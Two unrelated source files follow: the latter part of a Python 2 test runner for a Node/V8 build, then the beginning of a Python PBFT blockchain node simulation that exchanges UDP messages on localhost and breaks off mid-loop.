'status_line': "[%(mins)02i:%(secs)02i|\033[34m%%%(remaining) 4d\033[0m|\033[32m+%(passed) 4d\033[0m|\033[31m-%(failed) 4d\033[0m]: %(test)s",
'stdout': "\033[1m%s\033[0m",
'stderr': "\033[31m%s\033[0m",
}
super(ColorProgressIndicator, self).__init__(cases, flaky_tests_mode, templates)
def ClearLine(self, last_line_length):
print "\033[1K\r",
class MonochromeProgressIndicator(CompactProgressIndicator):
def __init__(self, cases, flaky_tests_mode):
templates = {
'status_line': "[%(mins)02i:%(secs)02i|%%%(remaining) 4d|+%(passed) 4d|-%(failed) 4d]: %(test)s",
'stdout': '%s',
'stderr': '%s',
'clear': lambda last_line_length: ("\r" + (" " * last_line_length) + "\r"),
'max_length': 78
}
super(MonochromeProgressIndicator, self).__init__(cases, flaky_tests_mode, templates)
def ClearLine(self, last_line_length):
print ("\r" + (" " * last_line_length) + "\r"),
PROGRESS_INDICATORS = {
'verbose': VerboseProgressIndicator,
'dots': DotsProgressIndicator,
'color': ColorProgressIndicator,
'tap': TapProgressIndicator,
'mono': MonochromeProgressIndicator
}
# -------------------------
# --- F r a m e w o r k ---
# -------------------------
class CommandOutput(object):
def __init__(self, exit_code, timed_out, stdout, stderr):
self.exit_code = exit_code
self.timed_out = timed_out
self.stdout = stdout
self.stderr = stderr
self.failed = None
class TestCase(object):
def __init__(self, context, path, mode):
self.path = path
self.context = context
self.duration = None
self.mode = mode
def IsNegative(self):
return False
def CompareTime(self, other):
return cmp(other.duration, self.duration)
def DidFail(self, output):
if output.failed is None:
output.failed = self.IsFailureOutput(output)
return output.failed
def IsFailureOutput(self, output):
return output.exit_code != 0
def GetSource(self):
return "(no source available)"
def RunCommand(self, command):
full_command = self.context.processor(command)
output = Execute(full_command,
self.context,
self.context.GetTimeout(self.mode))
self.Cleanup()
return TestOutput(self,
full_command,
output,
self.context.store_unexpected_output)
def BeforeRun(self):
pass
def AfterRun(self, result):
pass
def Run(self):
self.BeforeRun()
try:
result = self.RunCommand(self.GetCommand())
finally:
# Tests can leave the tty in non-blocking mode. If the test runner
# tries to print to stdout/stderr after that and the tty buffer is
# full, it'll die with a EAGAIN OSError. Ergo, put the tty back in
# blocking mode before proceeding.
if sys.platform != 'win32':
from fcntl import fcntl, F_GETFL, F_SETFL
from os import O_NONBLOCK
for fd in 0,1,2: fcntl(fd, F_SETFL, ~O_NONBLOCK & fcntl(fd, F_GETFL))
self.AfterRun(result)
return result
def Cleanup(self):
return
class TestOutput(object):
def __init__(self, test, command, output, store_unexpected_output):
self.test = test
self.command = command
self.output = output
self.store_unexpected_output = store_unexpected_output
def UnexpectedOutput(self):
if self.HasCrashed():
outcome = CRASH
elif self.HasTimedOut():
outcome = TIMEOUT
elif self.HasFailed():
outcome = FAIL
else:
outcome = PASS
return not outcome in self.test.outcomes
def HasPreciousOutput(self):
return self.UnexpectedOutput() and self.store_unexpected_output
def HasCrashed(self):
if utils.IsWindows():
return 0x80000000 & self.output.exit_code and not (0x3FFFFF00 & self.output.exit_code)
else:
# Timed out tests will have exit_code -signal.SIGTERM.
if self.output.timed_out:
return False
return self.output.exit_code < 0 and \
self.output.exit_code != -signal.SIGABRT
def HasTimedOut(self):
return self.output.timed_out;
def HasFailed(self):
execution_failed = self.test.DidFail(self.output)
if self.test.IsNegative():
return not execution_failed
else:
return execution_failed
def KillProcessWithID(pid):
if utils.IsWindows():
os.popen('taskkill /T /F /PID %d' % pid)
else:
os.kill(pid, signal.SIGTERM)
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.0001
SLEEP_TIME_FACTOR = 1.25
SEM_INVALID_VALUE = -1
SEM_NOGPFAULTERRORBOX = 0x0002 # Microsoft Platform SDK WinBase.h
def Win32SetErrorMode(mode):
prev_error_mode = SEM_INVALID_VALUE
try:
import ctypes
prev_error_mode = ctypes.windll.kernel32.SetErrorMode(mode);
except ImportError:
pass
return prev_error_mode
def RunProcess(context, timeout, args, **rest):
if context.verbose: print "#", " ".join(args)
popen_args = args
prev_error_mode = SEM_INVALID_VALUE;
if utils.IsWindows():
if context.suppress_dialogs:
# Try to change the error mode to avoid dialogs on fatal errors. Don't
# touch any existing error mode flags by merging the existing error mode.
# See http://blogs.msdn.com/oldnewthing/archive/2004/07/27/198410.aspx.
error_mode = SEM_NOGPFAULTERRORBOX;
prev_error_mode = Win32SetErrorMode(error_mode);
Win32SetErrorMode(error_mode | prev_error_mode);
process = subprocess.Popen(
shell = utils.IsWindows(),
args = popen_args,
**rest
)
if utils.IsWindows() and context.suppress_dialogs and prev_error_mode != SEM_INVALID_VALUE:
Win32SetErrorMode(prev_error_mode)
# Compute the end time - if the process crosses this limit we
# consider it timed out.
if timeout is None: end_time = None
else: end_time = time.time() + timeout
timed_out = False
# Repeatedly check the exit code from the process in a
# loop and keep track of whether or not it times out.
exit_code = None
sleep_time = INITIAL_SLEEP_TIME
while exit_code is None:
if (not end_time is None) and (time.time() >= end_time):
# Kill the process and wait for it to exit.
KillProcessWithID(process.pid)
exit_code = process.wait()
timed_out = True
else:
exit_code = process.poll()
time.sleep(sleep_time)
sleep_time = sleep_time * SLEEP_TIME_FACTOR
if sleep_time > MAX_SLEEP_TIME:
sleep_time = MAX_SLEEP_TIME
return (process, exit_code, timed_out)
def PrintError(str):
sys.stderr.write(str)
sys.stderr.write('\n')
def CheckedUnlink(name):
try:
os.unlink(name)
except OSError, e:
PrintError("os.unlink() " + str(e))
def Execute(args, context, timeout=None):
(fd_out, outname) = tempfile.mkstemp()
(fd_err, errname) = tempfile.mkstemp()
(process, exit_code, timed_out) = RunProcess(
context,
timeout,
args = args,
stdout = fd_out,
stderr = fd_err,
)
os.close(fd_out)
os.close(fd_err)
output = file(outname).read()
errors = file(errname).read()
CheckedUnlink(outname)
CheckedUnlink(errname)
return CommandOutput(exit_code, timed_out, output, errors)
def ExecuteNoCapture(args, context, timeout=None):
(process, exit_code, timed_out) = RunProcess(
context,
timeout,
args = args,
)
return CommandOutput(exit_code, False, "", "")
def CarCdr(path):
if len(path) == 0:
return (None, [ ])
else:
return (path[0], path[1:])
class TestConfiguration(object):
def __init__(self, context, root):
self.context = context
self.root = root
def Contains(self, path, file):
if len(path) > len(file):
return False
for i in xrange(len(path)):
if not path[i].match(file[i]):
return False
return True
def GetTestStatus(self, sections, defs):
pass
class TestSuite(object):
def __init__(self, name):
self.name = name
def GetName(self):
return self.name
# Use this to run several variants of the tests, e.g.:
# VARIANT_FLAGS = [[], ['--always_compact', '--noflush_code']]
VARIANT_FLAGS = [[]]
class TestRepository(TestSuite):
def __init__(self, path):
normalized_path = abspath(path)
super(TestRepository, self).__init__(basename(normalized_path))
self.path = normalized_path
self.is_loaded = False
self.config = None
def GetConfiguration(self, context):
if self.is_loaded:
return self.config
self.is_loaded = True
file = None
try:
(file, pathname, description) = imp.find_module('testcfg', [ self.path ])
module = imp.load_module('testcfg', file, pathname, description)
self.config = module.GetConfiguration(context, self.path)
finally:
if file:
file.close()
return self.config
def GetBuildRequirements(self, path, context):
return self.GetConfiguration(context).GetBuildRequirements()
def AddTestsToList(self, result, current_path, path, context, mode):
for v in VARIANT_FLAGS:
tests = self.GetConfiguration(context).ListTests(current_path, path, mode)
for t in tests: t.variant_flags = v
result += tests
def GetTestStatus(self, context, sections, defs):
self.GetConfiguration(context).GetTestStatus(sections, defs)
class LiteralTestSuite(TestSuite):
def __init__(self, tests):
super(LiteralTestSuite, self).__init__('root')
self.tests = tests
def GetBuildRequirements(self, path, context):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
if not name or name.match(test.GetName()):
result += test.GetBuildRequirements(rest, context)
return result
def ListTests(self, current_path, path, context, mode):
(name, rest) = CarCdr(path)
result = [ ]
for test in self.tests:
test_name = test.GetName()
if not name or name.match(test_name):
full_path = current_path + [test_name]
test.AddTestsToList(result, full_path, path, context, mode)
result.sort(cmp=lambda a, b: cmp(a.GetName(), b.GetName()))
return result
def GetTestStatus(self, context, sections, defs):
for test in self.tests:
test.GetTestStatus(context, sections, defs)
SUFFIX = {
'debug' : '_g',
'release' : '' }
FLAGS = {
'debug' : ['--enable-slow-asserts', '--debug-code', '--verify-heap'],
'release' : []}
TIMEOUT_SCALEFACTOR = {
'debug' : 4,
'release' : 1 }
class Context(object):
def __init__(self, workspace, buildspace, verbose, vm, timeout, processor, suppress_dialogs, store_unexpected_output):
self.workspace = workspace
self.buildspace = buildspace
self.verbose = verbose
self.vm_root = vm
self.timeout = timeout
self.processor = processor
self.suppress_dialogs = suppress_dialogs
self.store_unexpected_output = store_unexpected_output
def GetVm(self, mode):
if mode == 'debug':
name = 'out/Debug/node'
else:
name = 'out/Release/node'
# Currently GYP does not support output_dir for MSVS.
# http://code.google.com/p/gyp/issues/detail?id=40
# It will put the builds into Release/node.exe or Debug/node.exe
if utils.IsWindows():
out_dir = os.path.join(dirname(__file__), "..", "out")
if not exists(out_dir):
if mode == 'debug':
name = os.path.abspath('Debug/node.exe')
else:
name = os.path.abspath('Release/node.exe')
else:
name = os.path.abspath(name + '.exe')
return name
def GetVmCommand(self, testcase, mode):
return [self.GetVm(mode)] + self.GetVmFlags(testcase, mode)
def GetVmFlags(self, testcase, mode):
return testcase.variant_flags + FLAGS[mode]
def GetTimeout(self, mode):
return self.timeout * TIMEOUT_SCALEFACTOR[mode]
def RunTestCases(cases_to_run, progress, tasks, flaky_tests_mode):
progress = PROGRESS_INDICATORS[progress](cases_to_run, flaky_tests_mode)
return progress.Run(tasks)
def BuildRequirements(context, requirements, mode, scons_flags):
command_line = (['scons', '-Y', context.workspace, 'mode=' + ",".join(mode)]
+ requirements
+ scons_flags)
output = ExecuteNoCapture(command_line, context)
return output.exit_code == 0
# -------------------------------------------
# --- T e s t C o n f i g u r a t i o n ---
# -------------------------------------------
SKIP = 'skip'
FAIL = 'fail'
PASS = 'pass'
OKAY = 'okay'
TIMEOUT = 'timeout'
CRASH = 'crash'
SLOW = 'slow'
FLAKY = 'flaky'
class Expression(object):
pass
class Constant(Expression):
def __init__(self, value):
self.value = value
def Evaluate(self, env, defs):
return self.value
class Variable(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in env: return ListSet([env[self.name]])
else: return Nothing()
class Outcome(Expression):
def __init__(self, name):
self.name = name
def GetOutcomes(self, env, defs):
if self.name in defs:
return defs[self.name].GetOutcomes(env, defs)
else:
return ListSet([self.name])
class Set(object):
pass
class ListSet(Set):
def __init__(self, elms):
self.elms = elms
def __str__(self):
return "ListSet%s" % str(self.elms)
def Intersect(self, that):
if not isinstance(that, ListSet):
return that.Intersect(self)
return ListSet([ x for x in self.elms if x in that.elms ])
def Union(self, that):
if not isinstance(that, ListSet):
return that.Union(self)
return ListSet(self.elms + [ x for x in that.elms if x not in self.elms ])
def IsEmpty(self):
return len(self.elms) == 0
class Everything(Set):
def Intersect(self, that):
return that
def Union(self, that):
return self
def IsEmpty(self):
return False
class Nothing(Set):
def Intersect(self, that):
return self
def Union(self, that):
return that
def IsEmpty(self):
return True
class Operation(Expression):
def __init__(self, left, op, right):
self.left = left
self.op = op
self.right = right
def Evaluate(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.Evaluate(env, defs) or self.right.Evaluate(env, defs)
elif self.op == 'if':
return False
elif self.op == '==':
inter = self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
return not inter.IsEmpty()
else:
assert self.op == '&&'
return self.left.Evaluate(env, defs) and self.right.Evaluate(env, defs)
def GetOutcomes(self, env, defs):
if self.op == '||' or self.op == ',':
return self.left.GetOutcomes(env, defs).Union(self.right.GetOutcomes(env, defs))
elif self.op == 'if':
if self.right.Evaluate(env, defs): return self.left.GetOutcomes(env, defs)
else: return Nothing()
else:
assert self.op == '&&'
return self.left.GetOutcomes(env, defs).Intersect(self.right.GetOutcomes(env, defs))
def IsAlpha(str):
for char in str:
if not (char.isalpha() or char.isdigit() or char == '_'):
return False
return True
class Tokenizer(object):
"""A simple string tokenizer that chops expressions into variables,
parens and operators"""
def __init__(self, expr):
self.index = 0
self.expr = expr
self.length = len(expr)
self.tokens = None
def Current(self, length = 1):
if not self.HasMore(length): return ""
return self.expr[self.index:self.index+length]
def HasMore(self, length = 1):
return self.index < self.length + (length - 1)
def Advance(self, count = 1):
self.index = self.index + count
def AddToken(self, token):
self.tokens.append(token)
def SkipSpaces(self):
while self.HasMore() and self.Current().isspace():
self.Advance()
def Tokenize(self):
self.tokens = [ ]
while self.HasMore():
self.SkipSpaces()
if not self.HasMore():
return None
if self.Current() == '(':
self.AddToken('(')
self.Advance()
elif self.Current() == ')':
self.AddToken(')')
self.Advance()
elif self.Current() == '$':
self.AddToken('$')
self.Advance()
elif self.Current() == ',':
self.AddToken(',')
self.Advance()
elif IsAlpha(self.Current()):
buf = ""
while self.HasMore() and IsAlpha(self.Current()):
buf += self.Current()
self.Advance()
self.AddToken(buf)
elif self.Current(2) == '&&':
self.AddToken('&&')
self.Advance(2)
elif self.Current(2) == '||':
self.AddToken('||')
self.Advance(2)
elif self.Current(2) == '==':
self.AddToken('==')
self.Advance(2)
else:
return None
return self.tokens
class Scanner(object):
"""A simple scanner that can serve out tokens from a given list"""
def __init__(self, tokens):
self.tokens = tokens
self.length = len(tokens)
self.index = 0
def HasMore(self):
return self.index < self.length
def Current(self):
return self.tokens[self.index]
def Advance(self):
self.index = self.index + 1
def ParseAtomicExpression(scan):
if scan.Current() == "true":
scan.Advance()
return Constant(True)
elif scan.Current() == "false":
scan.Advance()
return Constant(False)
elif IsAlpha(scan.Current()):
name = scan.Current()
scan.Advance()
return Outcome(name.lower())
elif scan.Current() == '$':
scan.Advance()
if not IsAlpha(scan.Current()):
return None
name = scan.Current()
scan.Advance()
return Variable(name.lower())
elif scan.Current() == '(':
scan.Advance()
result = ParseLogicalExpression(scan)
if (not result) or (scan.Current() != ')'):
return None
scan.Advance()
return result
else:
return None
BINARIES = ['==']
def ParseOperatorExpression(scan):
left = ParseAtomicExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in BINARIES):
op = scan.Current()
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseConditionalExpression(scan):
left = ParseOperatorExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() == 'if'):
scan.Advance()
right = ParseOperatorExpression(scan)
if not right:
return None
left= Operation(left, 'if', right)
return left
LOGICALS = ["&&", "||", ","]
def ParseLogicalExpression(scan):
left = ParseConditionalExpression(scan)
if not left: return None
while scan.HasMore() and (scan.Current() in LOGICALS):
op = scan.Current()
scan.Advance()
right = ParseConditionalExpression(scan)
if not right:
return None
left = Operation(left, op, right)
return left
def ParseCondition(expr):
"""Parses a logical expression into an Expression object"""
tokens = Tokenizer(expr).Tokenize()
if not tokens:
print "Malformed expression: '%s'" % expr
return None
scan = Scanner(tokens)
ast = ParseLogicalExpression(scan)
if not ast:
print "Malformed expression: '%s'" % expr
return None
if scan.HasMore():
print "Malformed expression: '%s'" % expr
return None
return ast
class ClassifiedTest(object):
def __init__(self, case, outcomes):
self.case = case
self.outcomes = outcomes
class Configuration(object):
"""The parsed contents of a configuration file"""
def __init__(self, sections, defs):
self.sections = sections
self.defs = defs
def ClassifyTests(self, cases, env):
sections = [s for s in self.sections if s.condition.Evaluate(env, self.defs)]
all_rules = reduce(list.__add__, [s.rules for s in sections], [])
unused_rules = set(all_rules)
result = [ ]
all_outcomes = set([])
for case in cases:
matches = [ r for r in all_rules if r.Contains(case.path) ]
outcomes = set([])
for rule in matches:
outcomes = outcomes.union(rule.GetOutcomes(env, self.defs))
unused_rules.discard(rule)
if not outcomes:
outcomes = [PASS]
case.outcomes = outcomes
all_outcomes = all_outcomes.union(outcomes)
result.append(ClassifiedTest(case, outcomes))
return (result, list(unused_rules), all_outcomes)
class Section(object):
"""A section of the configuration file. Sections are enabled or
disabled prior to running the tests, based on their conditions"""
def __init__(self, condition):
self.condition = condition
self.rules = [ ]
def AddRule(self, rule):
self.rules.append(rule)
class Rule(object):
"""A single rule that specifies the expected outcome for a single
test."""
def __init__(self, raw_path, path, value):
self.raw_path = raw_path
self.path = path
self.value = value
def GetOutcomes(self, env, defs):
set = self.value.GetOutcomes(env, defs)
assert isinstance(set, ListSet)
return set.elms
def Contains(self, path):
if len(self.path) > len(path):
return False
for i in xrange(len(self.path)):
if not self.path[i].match(path[i]):
return False
return True
HEADER_PATTERN = re.compile(r'\[([^]]+)\]')
RULE_PATTERN = re.compile(r'\s*([^: ]*)\s*:(.*)')
DEF_PATTERN = re.compile(r'^def\s*(\w+)\s*=(.*)$')
PREFIX_PATTERN = re.compile(r'^\s*prefix\s+([\w\_\.\-\/]+)$')
def ReadConfigurationInto(path, sections, defs):
current_section = Section(Constant(True))
sections.append(current_section)
prefix = []
for line in utils.ReadLinesFrom(path):
header_match = HEADER_PATTERN.match(line)
if header_match:
condition_str = header_match.group(1).strip()
condition = ParseCondition(condition_str)
new_section = Section(condition)
sections.append(new_section)
current_section = new_section
continue
rule_match = RULE_PATTERN.match(line)
if rule_match:
path = prefix + SplitPath(rule_match.group(1).strip())
value_str = rule_match.group(2).strip()
value = ParseCondition(value_str)
if not value:
return False
current_section.AddRule(Rule(rule_match.group(1), path, value))
continue
def_match = DEF_PATTERN.match(line)
if def_match:
name = def_match.group(1).lower()
value = ParseCondition(def_match.group(2).strip())
if not value:
return False
defs[name] = value
continue
prefix_match = PREFIX_PATTERN.match(line)
if prefix_match:
prefix = SplitPath(prefix_match.group(1).strip())
continue
print "Malformed line: '%s'." % line
return False
return True
# ---------------
# --- M a i n ---
# ---------------
ARCH_GUESS = utils.GuessArchitecture()
def BuildOptions():
result = optparse.OptionParser()
result.add_option("-m", "--mode", help="The test modes in which to run (comma-separated)",
default='release')
result.add_option("-v", "--verbose", help="Verbose output",
default=False, action="store_true")
result.add_option('--logfile', dest='logfile',
help='write test output to file. NOTE: this only applies the tap progress indicator')
result.add_option("-S", dest="scons_flags", help="Flag to pass through to scons",
default=[], action="append")
result.add_option("-p", "--progress",
help="The style of progress indicator (verbose, dots, color, mono, tap)",
choices=PROGRESS_INDICATORS.keys(), default="mono")
result.add_option("--no-build", help="Don't build requirements",
default=True, action="store_true")
result.add_option("--build-only", help="Only build requirements, don't run the tests",
default=False, action="store_true")
result.add_option("--report", help="Print a summary of the tests to be run",
default=False, action="store_true")
result.add_option("-s", "--suite", help="A test suite",
default=[], action="append")
result.add_option("-t", "--timeout", help="Timeout in seconds",
default=60, type="int")
result.add_option("--arch", help='The architecture to run tests for',
default='none')
result.add_option("--snapshot", help="Run the tests with snapshot turned on",
default=False, action="store_true")
result.add_option("--simulator", help="Run tests with architecture simulator",
default='none')
result.add_option("--special-command", default=None)
result.add_option("--use-http1", help="Pass --use-http1 switch to node",
default=False, action="store_true")
result.add_option("--valgrind", help="Run tests through valgrind",
default=False, action="store_true")
result.add_option("--cat", help="Print the source of the tests",
default=False, action="store_true")
result.add_option("--flaky-tests",
help="Regard tests marked as flaky (run|skip|dontcare)",
default="run")
result.add_option("--warn-unused", help="Report unused rules",
default=False, action="store_true")
result.add_option("-j", help="The number of parallel tasks to run",
default=1, type="int")
result.add_option("--time", help="Print timing information after running",
default=False, action="store_true")
result.add_option("--suppress-dialogs", help="Suppress Windows dialogs for crashing tests",
dest="suppress_dialogs", default=True, action="store_true")
result.add_option("--no-suppress-dialogs", help="Display Windows dialogs for crashing tests",
dest="suppress_dialogs", action="store_false")
result.add_option("--shell", help="Path to V8 shell", default="shell")
result.add_option("--store-unexpected-output",
help="Store the temporary JS files from tests that fails",
dest="store_unexpected_output", default=True, action="store_true")
result.add_option("--no-store-unexpected-output",
help="Deletes the temporary JS files from tests that fails",
dest="store_unexpected_output", action="store_false")
return result
def ProcessOptions(options):
global VERBOSE
VERBOSE = options.verbose
options.mode = options.mode.split(',')
for mode in options.mode:
if not mode in ['debug', 'release']:
print "Unknown mode %s" % mode
return False
if options.simulator != 'none':
# Simulator argument was set. Make sure arch and simulator agree.
if options.simulator != options.arch:
if options.arch == 'none':
options.arch = options.simulator
else:
print "Architecture %s does not match sim %s" %(options.arch, options.simulator)
return False
# Ensure that the simulator argument is handed down to scons.
options.scons_flags.append("simulator=" + options.simulator)
else:
# If options.arch is not set by the command line and no simulator setting
# was found, set the arch to the guess.
if options.arch == 'none':
options.arch = ARCH_GUESS
options.scons_flags.append("arch=" + options.arch)
if options.snapshot:
options.scons_flags.append("snapshot=on")
def CheckTestMode(name, option):
if not option in ["run", "skip", "dontcare"]:
print "Unknown %s mode %s" % (name, option)
return False
return True
if not CheckTestMode("--flaky-tests", options.flaky_tests):
return False
return True
REPORT_TEMPLATE = """\
Total: %(total)i tests
* %(skipped)4d tests will be skipped
* %(nocrash)4d tests are expected to be flaky but not crash
* %(pass)4d tests are expected to pass
* %(fail_ok)4d tests are expected to fail that we won't fix
* %(fail)4d tests are expected to fail that we should fix\
"""
def PrintReport(cases):
def IsFlaky(o):
return (PASS in o) and (FAIL in o) and (not CRASH in o) and (not OKAY in o)
def IsFailOk(o):
return (len(o) == 2) and (FAIL in o) and (OKAY in o)
unskipped = [c for c in cases if not SKIP in c.outcomes]
print REPORT_TEMPLATE % {
'total': len(cases),
'skipped': len(cases) - len(unskipped),
'nocrash': len([t for t in unskipped if IsFlaky(t.outcomes)]),
'pass': len([t for t in unskipped if list(t.outcomes) == [PASS]]),
'fail_ok': len([t for t in unskipped if IsFailOk(t.outcomes)]),
'fail': len([t for t in unskipped if list(t.outcomes) == [FAIL]])
}
class Pattern(object):
def __init__(self, pattern):
self.pattern = pattern
self.compiled = None
def match(self, str):
if not self.compiled:
pattern = "^" + self.pattern.replace('*', '.*') + "$"
self.compiled = re.compile(pattern)
return self.compiled.match(str)
def __str__(self):
return self.pattern
def SplitPath(s):
stripped = [ c.strip() for c in s.split('/') ]
return [ Pattern(s) for s in stripped if len(s) > 0 ]
def GetSpecialCommandProcessor(value):
if (not value) or (value.find('@') == -1):
def ExpandCommand(args):
return args
return ExpandCommand
else:
pos = value.find('@')
import urllib
prefix = urllib.unquote(value[:pos]).split()
suffix = urllib.unquote(value[pos+1:]).split()
def ExpandCommand(args):
return prefix + args + suffix
return ExpandCommand
BUILT_IN_TESTS = ['simple', 'pummel', 'message', 'internet', 'gc']
def GetSuites(test_root):
def IsSuite(path):
return isdir(path) and exists(join(path, 'testcfg.py'))
return [ f for f in os.listdir(test_root) if IsSuite(join(test_root, f)) ]
def FormatTime(d):
millis = round(d * 1000) % 1000
return time.strftime("%M:%S.", time.gmtime(d)) + ("%03i" % millis)
def Main():
parser = BuildOptions()
(options, args) = parser.parse_args()
if not ProcessOptions(options):
parser.print_help()
return 1
ch = logging.StreamHandler(sys.stdout)
logger.addHandler(ch)
logger.setLevel(logging.INFO)
if options.logfile:
fh = logging.FileHandler(options.logfile)
logger.addHandler(fh)
workspace = abspath(join(dirname(sys.argv[0]), '..'))
suites = GetSuites(join(workspace, 'test'))
repositories = [TestRepository(join(workspace, 'test', name)) for name in suites]
repositories += [TestRepository(a) for a in options.suite]
root = LiteralTestSuite(repositories)
if len(args) == 0:
paths = [SplitPath(t) for t in BUILT_IN_TESTS]
else:
paths = [ ]
for arg in args:
path = SplitPath(arg)
paths.append(path)
# Check for --valgrind option. If enabled, we overwrite the special
# command flag with a command that uses the run-valgrind.py script.
if options.valgrind:
run_valgrind = join(workspace, "tools", "run-valgrind.py")
options.special_command = "python -u " + run_valgrind + " @"
shell = abspath(options.shell)
buildspace = dirname(shell)
processor = GetSpecialCommandProcessor(options.special_command)
if options.use_http1:
def wrap(processor):
return lambda args: processor(args[:1] + ['--use-http1'] + args[1:])
processor = wrap(processor)
context = Context(workspace,
buildspace,
VERBOSE,
shell,
options.timeout,
processor,
options.suppress_dialogs,
options.store_unexpected_output)
# First build the required targets
if not options.no_build:
reqs = [ ]
for path in paths:
reqs += root.GetBuildRequirements(path, context)
reqs = list(set(reqs))
if len(reqs) > 0:
if options.j != 1:
options.scons_flags += ['-j', str(options.j)]
if not BuildRequirements(context, reqs, options.mode, options.scons_flags):
return 1
# Just return if we are only building the targets for running the tests.
if options.build_only:
return 0
# Get status for tests
sections = [ ]
defs = { }
root.GetTestStatus(context, sections, defs)
config = Configuration(sections, defs)
# List the tests
all_cases = [ ]
all_unused = [ ]
unclassified_tests = [ ]
globally_unused_rules = None
for path in paths:
for mode in options.mode:
if not exists(context.GetVm(mode)):
print "Can't find shell executable: '%s'" % context.GetVm(mode)
continue
env = {
'mode': mode,
'system': utils.GuessOS(),
'arch': options.arch,
'simulator': options.simulator
}
test_list = root.ListTests([], path, context, mode)
unclassified_tests += test_list
(cases, unused_rules, all_outcomes) = config.ClassifyTests(test_list, env)
if globally_unused_rules is None:
globally_unused_rules = set(unused_rules)
else:
globally_unused_rules = globally_unused_rules.intersection(unused_rules)
all_cases += cases
all_unused.append(unused_rules)
if options.cat:
visited = set()
for test in unclassified_tests:
key = tuple(test.path)
if key in visited:
continue
visited.add(key)
print "--- begin source: %s ---" % test.GetLabel()
source = test.GetSource().strip()
print source
print "--- end source: %s ---" % test.GetLabel()
return 0
if options.warn_unused:
for rule in globally_unused_rules:
print "Rule for '%s' was not used." % '/'.join([str(s) for s in rule.path])
if options.report:
PrintReport(all_cases)
result = None
def DoSkip(case):
return (SKIP in case.outcomes or SLOW in case.outcomes or
(FLAKY in case.outcomes and options.flaky_tests == "skip"))
cases_to_run = [ c for c in all_cases if not DoSkip(c) ]
if len(cases_to_run) == 0:
print "No tests to run."
return 1
else:
try:
start = time.time()
if RunTestCases(cases_to_run, options.progress, options.j, options.flaky_tests):
result = 0
else:
result = 1
duration = time.time() - start
except KeyboardInterrupt:
print "Interrupted"
return 1
if options.time:
# Write the times to stderr to make it easy to separate from the
# test output.
print
sys.stderr.write("--- Total time: %s ---\n" % FormatTime(duration))
timed_tests = [ t.case for t in cases_to_run if not t.case.duration is None ]
timed_tests.sort(lambda a, b: a.CompareTime(b))
index = 1
for entry in timed_tests[:20]:
t = FormatTime(entry.duration)
sys.stderr.write("%4i (%s) %s\n" % (index, t, entry.GetLabel()))
index += 1
return result
if __name__ == '__main__':
sys.exit(Main())
|
main.py
|
import multiprocessing
import threading
import sys
import os
from time import sleep, time
import time
import signal
import subprocess
from datetime import datetime
import socket
from collections import OrderedDict
import binascii
import Crypto
import Crypto.Random
from Crypto.Hash import SHA
from Crypto.PublicKey import RSA
from Crypto.Signature import PKCS1_v1_5
import random
import hashlib
import json
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
# from urllib.parse import urlparse
from uuid import uuid4
import requests
from flask import Flask, jsonify, request, render_template
from flask_cors import CORS
from blockchain import *
# usleep = lambda x: time.sleep(x/1000000.0)
node_address_d = {}
private_keys_d = {}
public_keys_d = {}
pre_prepare = {}
prepare = {}
commit = {}
reply = {}
total_nodes = 0
TOTALTRASPOST = 100
TOTALTRASFETCH = 100
PORTFACTOR = 5000
current_time_us = lambda: int(round(time() * 1000000))
MINE_MINT = -1
total_nodes = 0
IOT1 = 0
IOT2 = 0
log_suffix = ""
commit_counter = 0
def signal_handler(sig, frame):
print('You pressed Ctrl+C! MPP Exit.')
sys.exit(0)
def blockchain_node(pid,total_nodes, node_address_d, lock):
global commit_counter
# global lock
# global node_address_d
if pid == 0:
fh = open('keys', 'w')
else:
fh = open('addresses', 'a')
ret = new_wallet()
private_key = ret['private_key']
public_key = ret['public_key']
private_keys_d[pid] = private_key
public_keys_d[pid] = public_key
node = Blockchain()
uuid = node.node_id
node_address_d[pid] = uuid
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind the socket to the port
server_address = ('localhost', PORTFACTOR+pid)
print ('Starting up node on <port,pid,UUID>:', (PORTFACTOR+pid), pid, str(uuid))
sock.bind(server_address)
count = 0
pbft_d = {}
ct_count = 0
desired_count = int(total_nodes/3)
first_value = ""
while True:
# print (pid, "recv")
data, address = sock.recvfrom(4096)
data = data.decode().split(">")
# print (data)
flag = data[0]
# New transaction
if flag == "FT":
# print (pid, "FETCH")
t_value = data[1]
t_value_in = t_value+"~"
match_found = 'N'
# for i in range(0, len(node.chain)):
i = len(node.chain) - 1
while i >= 0:
trans = node.chain[i]['transactions']
if len(trans) > 0:
for d in trans:
if d['value'] == t_value:
match_found = 'V'
elif d['value'] == t_value_in:
match_found = 'R'
if match_found != 'N':
break
i -= 1
# print ("BLOCK: ", i, d['value'])
data = str(current_time_us())+','+str(match_found)+','+data[1]
# print ("SENDING FT RESP: ", data)
sent = sock.sendto(data.encode(), address)
elif flag == 'FA': # Fetch all Transaction
all_trans = ""
print (pid, len(node.chain))
for i in range(0, len(node.chain)):
trans = node.chain[i]['transactions']
if len(trans) > 0:
for d in trans:
all_trans += str(d)+"\n"
print ("BLOCK: ", pid, i, d)
fh = open("./logs/all_transactions_"+str(pid), "w")
fh.write(all_trans)
all_trans = ""
fh.close()
elif flag == 'NT': # New transaction
msg = json.loads(data[1])
# print ('received %s bytes from %s' % (len(data), address))
# print (flag, msg )
count += 1
ret = new_transaction(node, msg)
# print (pid, ret)
elif flag == 'PP': # PBFT Pre-prepare
# print (pid, 'PP', data)
message = 'PR>'+str(data[1])+'>'+data[2]+'>'+data[3]
pbft_prepare(sock, total_nodes, pid, message, PORTFACTOR)
elif flag == 'PR': # PBFT Prepare
# print (pid, 'PR')
message = 'CT>'+str(data[1])+'>'+data[2]+'>'+data[3]
pbft_commit(sock, total_nodes, pid, message, PORTFACTOR)
elif flag == 'CT': # PBFT Commit
# print (pid, 'CT')
# ct_count += 1
if data[2] != first_value:
pbft_d[address] = data[2]
if len(pbft_d) >= desired_count:
keys = list(pbft_d.keys())
